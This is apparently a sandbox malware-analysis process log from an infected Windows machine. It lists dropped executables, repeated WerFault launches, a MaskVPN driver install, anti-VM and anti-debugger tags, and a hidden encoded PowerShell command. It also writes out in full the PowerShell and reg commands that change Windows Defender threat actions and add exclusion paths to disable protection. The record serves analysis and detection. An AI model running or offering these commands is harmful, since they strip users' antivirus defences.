C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 17004⤵PID:1532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19284⤵PID:3420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 25084⤵PID:1476
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19364⤵
- Executes dropped EXE
PID:3568 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16764⤵PID:3688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 24644⤵PID:3648
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16764⤵PID:1472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19404⤵PID:536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 18004⤵PID:3764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 19124⤵PID:3256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 17804⤵PID:4768
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 15644⤵PID:3424
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 17044⤵PID:3456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 16044⤵PID:3764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 17724⤵PID:3788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4492 -s 1404⤵PID:1080
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4264 -ip 42641⤵PID:5076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4264 -ip 42641⤵PID:708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4264 -ip 42641⤵PID:3380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4264 -ip 42641⤵PID:2856
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4492 -ip 44921⤵PID:2944
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4492 -ip 44921⤵PID:2792
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4492 -ip 44921⤵PID:1516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4492 -ip 44921⤵PID:3788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4492 -ip 44921⤵PID:2948
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4492 -ip 44921⤵PID:212
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4492 -ip 44921⤵PID:1068
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4492 -ip 44921⤵PID:3176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4492 -ip 44921⤵PID:4516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4492 -ip 44921⤵PID:3776
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4492 -ip 44921⤵PID:3908
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4492 -ip 44921⤵PID:3852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4492 -ip 44921⤵PID:3256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4492 -ip 44921⤵PID:3688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4492 -ip 44921⤵PID:4996
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4492 -ip 44921⤵PID:4956
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4492 -ip 44921⤵PID:1272
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4492 -ip 44921⤵PID:3696
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3344
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4492 -ip 44921⤵PID:3872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4492 -ip 44921⤵PID:1872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4492 -ip 44921⤵PID:1732
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4492 -ip 44921⤵PID:4308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4492 -ip 44921⤵PID:224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4492 -ip 44921⤵PID:1976
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4492 -ip 44921⤵PID:2404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4492 -ip 44921⤵PID:5028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4492 -ip 44921⤵PID:1856
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4492 -ip 44921⤵PID:396
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4492 -ip 44921⤵PID:3696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4492 -ip 44921⤵PID:4208
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4492 -ip 44921⤵PID:2792
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4492 -ip 44921⤵PID:3676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4492 -ip 44921⤵PID:4680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4492 -ip 44921⤵PID:1908
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4492 -ip 44921⤵PID:2396
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 4492 -ip 44921⤵PID:1384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4492 -ip 44921⤵PID:3992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4492 -ip 44921⤵PID:2892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4492 -ip 44921⤵PID:3396
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4492 -ip 44921⤵PID:2732
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4492 -ip 44921⤵PID:4268
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 4492 -ip 44921⤵PID:808
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4492 -ip 44921⤵PID:3740
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4492 -ip 44921⤵PID:1532
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 4492 -ip 44921⤵PID:116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:2416
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2944
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4492 -ip 44921⤵PID:624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4492 -ip 44921⤵PID:4012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 4492 -ip 44921⤵PID:2240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4492 -ip 44921⤵PID:4060
-
C:\Users\Admin\Programs\Adblock\DnsService.exeC:\Users\Admin\Programs\Adblock\DnsService.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4492 -ip 44921⤵PID:4560
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4492 -ip 44921⤵PID:1076
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 4492 -ip 44921⤵PID:3720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4492 -ip 44921⤵PID:3764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4580 -ip 45801⤵PID:2884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4492 -ip 44921⤵PID:2856
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4492 -ip 44921⤵PID:1472
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4492 -ip 44921⤵
- Executes dropped EXE
PID:4872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:3784 -
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{c3fc8945-ae57-f447-b7c5-b6a82972291b}\oemvista.inf" "9" "4d14a44ff" "00000000000000E0" "WinSta0\Default" "0000000000000158" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:3688
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "00000000000000E0"2⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:4264
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4492 -ip 44921⤵PID:2512
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 4492 -ip 44921⤵PID:2720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4492 -ip 44921⤵PID:2292
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4492 -ip 44921⤵PID:1268
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 4492 -ip 44921⤵PID:260
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4492 -ip 44921⤵PID:3764
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4492 -ip 44921⤵PID:3304
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4492 -ip 44921⤵PID:4544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4492 -ip 44921⤵
- Executes dropped EXE
PID:3924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4492 -ip 44921⤵
- Executes dropped EXE
PID:4400
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4492 -ip 44921⤵
- Executes dropped EXE
PID:4128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 4492 -ip 44921⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 4492 -ip 44921⤵PID:408
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 4492 -ip 44921⤵PID:1812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4492 -ip 44921⤵PID:4188
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:3968 -
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:3660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:3688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:400
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2148
-
C:\Users\Admin\AppData\Local\Temp\uGlEhivBhQbjdirCX\rDJYlBYIgtHmaDE\diEMfCw.exeC:\Users\Admin\AppData\Local\Temp\uGlEhivBhQbjdirCX\rDJYlBYIgtHmaDE\diEMfCw.exe oO /site_id 690689 /S1⤵
- Drops file in System32 directory
PID:4544 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1676 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:3316
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4504
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:1548
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:3988
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:1812
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3532
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4556
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1868
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3188
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4748
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:3732
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4604
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:1316
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5104
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:2156
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:3516
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2052
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:2852
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:4580
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:4620
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2288
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:3208
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4216
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4112
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1360
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PExkgafzBdIObhRgcoR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PExkgafzBdIObhRgcoR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hjrwynviHbgqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hjrwynviHbgqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hoTBfSJVSoUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hoTBfSJVSoUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\idMlarptIFwU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\idMlarptIFwU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jSTUIzYTU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jSTUIzYTU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hUAxTutGQQYDpiVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hUAxTutGQQYDpiVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uGlEhivBhQbjdirCX\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uGlEhivBhQbjdirCX\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v 